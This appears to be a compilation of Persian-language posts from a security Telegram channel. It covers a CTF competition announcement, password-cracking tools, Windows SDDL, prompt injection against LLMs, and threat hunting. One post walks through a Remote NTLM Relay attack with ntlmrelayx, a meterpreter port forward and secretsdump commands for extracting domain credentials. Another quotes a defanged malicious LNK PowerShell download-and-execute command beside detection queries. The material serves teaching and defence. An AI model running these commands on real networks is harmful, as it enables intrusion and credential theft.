🚀 آغاز مرحله مقدماتی مسابقه BlueCup

🔵 در مرحله اول این رقابت، شرکت‌کنندگان با مجموعه‌ای از چالش‌های مربوط به شناسایی حملات روبه‌رو می‌شن. شروع مسیر با سوالاتی از حوزه پاسخگویی به رخداد خواهد بود و بعد از اون باید سراغ حل چالش‌های فنی برید.

🏆 نفرات برتر این مرحله به دور بعد راه پیدا می‌کنن و در قالب گروهی رقابت می‌کنن؛ رقابت‌ها تا فینال ادامه خواهد داشت و در نهایت برترین‌ها در قالبی متفاوت به مصاف هم میرن.

📅 تاریخ برگزاری: جمعه 18 مهر
⏰ زمان: 10 صبح تا 17 (7 ساعت)
📍 محل: بخش مسابقات در پروفایل کاربری Challenginno

⚡️ نکات مهم:

برای شرکت در مسابقه نیازی به ثبت‌نام مجدد و پرداخت هزینه نیست.

کاربرانی که هنوز ثبت‌نام نکرده‌اند، تا شروع مسابقه فرصت دارن حساب خودشون رو بسازن.

سطح مسابقه: مقدماتی تا متوسط

🎁 جوایز نقدی:
🥇 نفر اول: 30 میلیون تومان
🥈 نفر دوم: 10 میلیون تومان
(در فینال امکان انتخاب حالت Raise هم وجود داره که شرایط اون اعلام خواهد شد.)

🔗 همین حالا آماده شو و وارد رقابت BlueCup بشو!

🌐 https://challenginno.ir
🌐 https://news.1rj.ru/str/challenginno

🔖 اصل قضیه: Remote NTLM Relay

⭕ امروز می‌ خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به‌ خاطر ویژگی‌ های exploiting زیاد استفاده نشده، ولی دونستنش مفیده.

اینجا حرف از Remote NTLM Relay هست: حمله‌ای که با متوقف‌سازی اجباری سرویس‌ های SMB روی سرور و راه‌اندازی مجدد اون‌ ها کار میکنه، به‌طوری که ترافیک واردشون روی پورت 445 پس از ری‌ استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن‌ های ورودی رو به هر جایی که می‌خواد رله کنه.

برای exploiting باید چند مرحله ساده رو انجام بدیم.

💢 مرحله 1 > آماده‌ سازی سرور

برای آماده‌ سازی سرور جهت exploiting، باید سرویس‌ های SMB رو غیرفعال و سرور رو ری‌ استارت کنیم. مراحل به‌ صورت کلی اینه:

1. غیرفعال‌سازی NetLogon:

   sc stop netlogon

2. غیرفعال و متوقف‌کردن SMB Server (LanManServer):

   sc stop lanmanserver
   sc config lanmanserver start= disabled

3. توقف کامل LanManWorkstation:

   sc stop lanmanworkstation
   sc config lanmanworkstation start= disabled

این مراحل توی اسکرین‌ شات اول قابل مشاهده‌ست.
بعد از غیرفعالسازی سرویس‌ها باید ماشین رو ری‌ استارت کنیم (shutdown /r /t 0) خیلی مهمه که دستگاه ری‌ استارت بشه نه اینکه خاموش بشه.
پس از بوت شدن مجدد و به‌دست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، می‌تونیم به مرحله بعد بریم.

💢 مرحله 2 > تنظیم ماشین مهاجم

روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده می‌کنیم. در مثالی که من اجرا کردم، هدف سرور 10.201.126.30 بود (چون برای این هدف SMB نیازی به signing نداشت). پراکسی‌ ای که استفاده میکنیم روی پورت 1090 listening میکنه، بنابراین دستور اجرا شبیه اینه:

proxychains impacket-ntlmrelayx -t smb://10.201.126.30 -smb2support -socks -socks-port 1090

💢 مرحله 3 > TCP relay با meterpreter

با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت 445/TCP روی سرور رو به ماشین مهاجم (که رله رو انجام می‌ده) فوروارد/ریدایرکت می‌ کنیم. مثال دستور:

portfwd add -R -L 10.51.124.39 -l 445 -p 445

اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می‌ بینید.

💢 مرحله 4 > Post-exploitation

بعد از اینکه رله موفق باشه، ntlmrelayx.py معمولاً سشن رو باز نگه میداره؛ بنابراین با ساخت یک کانفیگ سفارشی برای proxychains می‌ تونیم از ابزارهای دیگهٔ Impacket-like برای کارهای post-exploitation استفاده کنیم.
در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی‌ ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامه‌ها و lateral movement در دامنه استفاده کنیم:

proxychains -f p4-ntlm-relay.conf impacket-secretsdump -no-pass HOLOLIVE/SRV-ADMIN@10.201.126.30

چرا این وکتور کمتر رایجه؟

دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست:

غیرفعال‌کردن سرویس‌ های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط‌ های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه.

@TryHackBox
#AD #NTLM #Attack

مشاغل امنیت سایبری هوش مصنوعی

@TryHackBoxOfficial | Github | YouTube | Group
#AI #SANS #THB

PASSWORD CRACKING TOOLS

🔐 سری ابزار های مفید برای شکستن پسورد ها (با هدف بررسی میزان امنیت آنها)

✍️نویسنده
@TryHackBox | The Chaos

🔑 ابزارهای امنیت رمزعبور - راهنمای آگاهی و دفاع 🛡

رمزعبورهای ضعیف و تکراری همچنان یکی از بزرگ‌ترین ریسک‌های امنیتی هستند! محققان امنیتی و تسترهای نفوذ در محیط‌های آزمایشگاهی و تست‌های مجاز از این ابزارها برای شناسایی آسیب‌پذیری‌ها استفاده می‌کنند.

🛠 ابزارهای رایج:
• John the Ripper
ابزار کلاسیک تست رمزعبور برای فرمت‌های مختلف
• RainbowCrack
استفاده از جدول رنگین‌کمان برای کرک سریع
• Wfuzz
فاز کردن برای پیدا کردن مسیرها و پارامترهای پنهان
• Cain & Abel
مجموعه ابزار بازیابی رمزعبور ویندوز (نسخه لگاسی)
• THC Hydra
تستر رمزعبور لاگین شبکه (SSH, FTP, RDP, HTTP)
• Medusa
تستر موازی و ماژولار رمزعبور
• OphCrack
ابزار کرک رمزعبور با استفاده از جدول رنگین‌کمان
• L@phtCrack
ابزار قدیمی اما قدرتمند تست رمزعبور
• Aircrack-ng
مجموعه ابزار امنیت شبکه‌های Wi-Fi
• Brutus
ابزار تست رمزعبور از راه دور

🛡 راهکارهای دفاعی:
✅ اجرای سیاست‌های قوی رمزعبور
(طول مناسب، پیچیدگی، یکتایی)

✅ فعال‌سازی احراز هویت دو مرحله‌ای (MFA/2FA)

✅ حسابرسی منظم اعتبارنامه‌ها و حذف اکانت‌های قدیمی

✅ استفاده از مدیران رمزعبور برای کاهش استفاده تکراری

✅ مانیتورینگ نشت اطلاعات در فیدهای تهدیدات سایبری

✍️نویسنده
@TryHackBox | The Chaos
#PasswordSecurity #CyberSecurity #EthicalHacking

بخش اول: تزریق پرامپت Exploiting  از سردرگمی دستورات LLM

تزریق پرامپت یک نقص اساسی در مدل‌های زبان بزرگ امروزی (LLMs) را نشان می‌دهد که ریشه در ناتوانی آن‌ها در تشخیص قابل اعتماد بین داده‌ها و دستورات اجرایی دارد. بر خلاف نرم‌افزارهای کلاسیک که به وضوح کد را از داده‌ها جدا می‌کنند، LLMها به همه ورودی‌ها به عنوان دستورات بالقوه یکسان نگاه می‌کنند.

@TryHackBox | Github | YouTube | Group
#Prompt_injection #exploiting

🔖 بیایید بیشتر در مورد APT حرف بزنیم.

@TryHackBox | Github | YouTube | Group
#APT #Hackers

🔖 SDDL | اشک‌هاتو برای یه روز دیگه نگه دار

💢 بخش اول

📃 چند بار چشمای خودتون رو خسته کردید تا ACL تو ویندوز رو بفهمید؟ مثلاً این رشته:

O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x3;;;BO)(A;;0x5;;;SO)(A;;0x1;;;IU)(A;;0x3;;;SU)(A;;0x1;;;S-1-5-3)(A;;0x2;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)

به این معنیه:

1️⃣ O:BA
- مالک (Owner): "مدیران داخلی" (Built-in Administrators)
2️⃣ G:SY
- گروه (Group): "سیستم محلی" (Local System)
3️⃣ Last part
DACL (Discretionary Access Control List)

بیاید یه بخش از DACL رو رمزگشایی کنیم:

(A;;0x7;;;BA)
- دسترسی مجاز (ACCESS ALLOWED) برای "مدیران داخلی" (Built-in Administrators) برای ایجاد دایرکتوری‌ها، لیست کردن دایرکتوری و نوشتن داده.

@TryHackBox
#Windows #SDDL

🔖 SDDL  | اشک‌هاتو برای یه روز دیگه نگه دار

⭕ بخش دوم

(برای عمیق ترشدن تو فرمت SDDL، این پست رو ببینید: لینک)

اگه حرفه‌ای تو فهمیدن SDDL نیستید، کافیه از cmdlet ConvertFrom-SddlString استفاده کنید که از PowerShell 5.0 معرفی شده. می‌تونید بخش سخت DACL رو این‌جوری گسترش بدید:

ConvertFrom-SddlString "O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)" | Select -Expand DiscretionaryAcl

اگه از PowerShell متنفرید، از این ابزارها استفاده کنید:

https://github.com/advancedmonitoring/SDDLViewer
https://github.com/zacateras/sddl-parser

@TryHackBox
#Windows #SDDL

💢 بازیابی رمزهای عبور از ترافیک Kerberos کپچر شده

✍ یه یادداشت یهویی که می‌ تونه به شما کمک کنه بدون نیاز به تعامل با کنترلر دامنه (Domain Controller)، به‌صورت مخفیانه اطلاعات کاربری یه کاربر دامنه رو به دست بیارید!

📃 مقاله ما راجب Kerberos

@TryHackBox | Github | YouTube | Group
#Kerberos #Password

📃 طبق این گزارش مهاجم از یه فایل LNK مخرب برای اجرای یه دستور مخفی PowerShell استفاده کرده که یه سند PDF جعلی (lure) و یه فایل ZIP دیگه رو از آدرس Bunny CDN دانلود میکنه:

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { iwr 'hxxps://555555cnd.b-cdn[.]net/Marriott_Marketing_Job_Denoscription.pdf' -OutFile 'C:\Users\Public\Marriott.pdf'; Start-Process 'C:\Users\Public\Marriott.pdf'; Start-Sleep -Seconds 3; iwr 'hxxps://555555cnd.b-cdn[.]net/002.zip' -OutFile 'C:\Users\Public\002.zip'; Expand-Archive -Path 'C:\Users\Public\002.zip' -DestinationPath 'C:\Users\Public' -Force; Start-Process 'C:\Users\Public\XtraViewer.exe' -ArgumentList '/silent_start' } catch {}"

با وجود اینکه این دستور خیلی رایجه و به‌راحتی میشه کشفش کرد، استفاده از Bunny CDN جالب به نظر میرسه. و البته، ما میتونیم ازش برای شکار (hunting) استفاده کنیم:

event_type: "dnsreqwin"

AND

dns_rname: "b-cdn.net"

@TryHackBox
#LNKMalware #PowerShell #Malicious

در برخی موارد، مهاجمان از پسوندهای دامنه‌ی غیرمعمول و خاص برای زیرساخت‌های خود استفاده می‌کنند. بیایید به یک نمونه‌ی اخیر که مربوط به بدافزار Rhadamanthys است نگاهی بیندازیم. بیشتر دامنه‌ها دارای پسوندهایی هستند که بسیار مشکوک به نظر می‌رسند، مانند:

cloud341[.]autos
cloud341[.]baby
cloud341[.]icu
cloud341[.]lol
cloud341[.]monster
cloud34221[.]hair
cloud34221[.]homes
cloud34221[.]quest
cloud343[.]boats
cloud9342[.]beauty

ارزشش را دارد که برای این مورد یک کوئری هانتر بنویسیم، نه؟

event_type: "dnsreqwin"

AND

dns_rname: (*.autos OR *.baby OR *.icu OR *.lol OR *.monster OR *.hair OR *.homes OR *.quest OR *.boats OR *.beauty)

@TryHackBox